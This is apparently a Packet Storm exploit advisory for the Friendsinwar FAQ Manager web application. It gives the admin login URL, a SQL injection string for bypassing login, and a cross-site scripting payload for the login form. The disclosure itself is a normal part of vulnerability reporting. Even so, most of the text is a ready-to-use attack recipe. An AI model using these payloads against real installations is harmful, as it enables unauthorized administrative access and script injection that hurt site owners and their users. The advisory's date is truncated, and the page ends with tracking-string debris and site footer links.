Friendsinwar FAQ Manager suffers from cross site scripting and remote SQL injection vulnerabilities.
35337c062bae0717390401b351c07341d274c3e80221eb3e15364f51ee464aea# Exploit Title: friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/the_faq_manager/
# Tested on: Windows 7
# Blog: d3b4g.me
----------------------------------------------------------------------------------
() SQL Injection :
http://localhost/path/the_faq_manager/admin/login.php
+ Use following information to bypass login.
User:admin
' or ' 1=1
() Cross Site Scripting:
XSS in loging form, insert follwing JS code to loging follwing.
'"()&%1<ScRiPt >prompt(952226)</ScRiPt>
-end-
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed